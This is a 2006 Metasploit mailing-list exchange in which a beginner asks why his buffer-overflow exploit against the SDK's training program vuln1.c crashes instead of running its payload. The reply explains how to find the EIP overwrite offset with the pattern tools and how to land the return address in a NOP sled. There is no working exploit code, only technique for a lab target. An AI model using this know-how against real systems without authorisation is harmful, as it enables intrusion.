Framework SDK 2.5 doubts

[sahirh at mielesecurity.com (Sahir Hidayatullah)]

First check whether you're overwriting the saved EIP with the right number
of bytes. You can figure out the exact length of your buffer using
PatternCreate() in conjunction with patternoffset.pl from the SDK directory.
If you're sure you're overwriting EIP completely, look at the address that
you're returning to and ensure that your nops lie there. From what I
understood, you picked an address among a series of 'A's, if you return into
a string of 'A's, they will not be valid instructions and your exploit will
bork.

 

--S.

 

 

  _____  

From: curious one [mailto:0x0804 at gmail.com] 
Sent: Thursday, April 06, 2006 5:37 PM
To: framework at metasploit.com
Subject: [framework] Framework SDK 2.5 doubts

 

Hi,

I am a n00b here. I was trying to learn remote exploitation using
metasploit's documentation. I used the sdk and the prog vuln1.c as target. I
followed the first part where we find the offsets and locate the return
address accordingly. My problem is when I am trying it with vuln1_2.pm
exploit module my return addres is never right 

Everytime I try a return address i get this :

Program received signal SIGSEGV, Segmentation fault.
0xbfb247cf in ?? ()

I do a x/200x $esp-256 in gdb and I can see a 'A' sled. i choose an address
in that address and run teh exploit again still I end up with just a dos and
my payload is not getting through at all. Any help on that??? 

I am using Slax (backtrack if you please), gcc 3.3.5, kernel 2.6.12.2 .

All help will be appriciated.

Cheers

-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20060407/a809e8c2/attachment.htm>